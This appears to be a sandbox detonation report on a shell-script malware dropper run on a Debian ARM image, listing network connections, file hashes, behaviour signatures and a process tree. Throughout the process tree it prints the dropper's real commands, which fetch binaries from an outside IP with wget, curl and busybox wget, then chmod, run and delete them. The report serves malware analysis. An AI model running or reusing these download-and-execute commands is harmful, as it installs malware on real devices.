[curl -O http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/chmod

[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly

[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/rm

[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.65.91:443 tcp
US 151.101.65.91:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 195.181.164.15:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-28 02:06

Reported

2024-10-28 02:08

Platform

debian9-armhf-20240611-en

Max time kernel

25s

Max time network

26s

Command Line

[/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 N/A
N/A /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd N/A
N/A /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX N/A
N/A /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 N/A
N/A /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme N/A
N/A /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc N/A
N/A /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB N/A
N/A /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N N/A
N/A /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS N/A
N/A /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G N/A
N/A /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ N/A
N/A /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 N/A
N/A /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly N/A
N/A /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 N/A
N/A /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 N/A
N/A /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 N/A
N/A /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd N/A
N/A /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX N/A
N/A /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme N/A
N/A /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS N/A
N/A /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G N/A
N/A /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /usr/bin/curl N/A
File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /usr/bin/curl N/A
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A
File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /usr/bin/curl N/A
File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /usr/bin/curl N/A
File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /usr/bin/curl N/A
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A
File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /usr/bin/curl N/A
File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /usr/bin/curl N/A
File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /usr/bin/curl N/A
File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /usr/bin/curl N/A
File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /usr/bin/curl N/A
File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /usr/bin/curl N/A
File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /usr/bin/curl N/A
File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /usr/bin/curl N/A
File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /usr/bin/curl N/A
File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /usr/bin/curl N/A
File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /usr/bin/curl N/A
File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /usr/bin/curl N/A
File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /usr/bin/curl N/A
File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /usr/bin/curl N/A
File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /usr/bin/curl N/A

Processes

/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh

[/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/chmod

[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB

[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/rm

[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/wget

[wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/chmod

[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N

[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/rm

[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/wget

[wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/chmod

[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ

[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/rm

[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/chmod

[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75

[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/rm

[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/wget

[wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/chmod

[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly

[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/rm

[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/wget

[wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/chmod

[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98

[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/rm

[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/wget

[wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

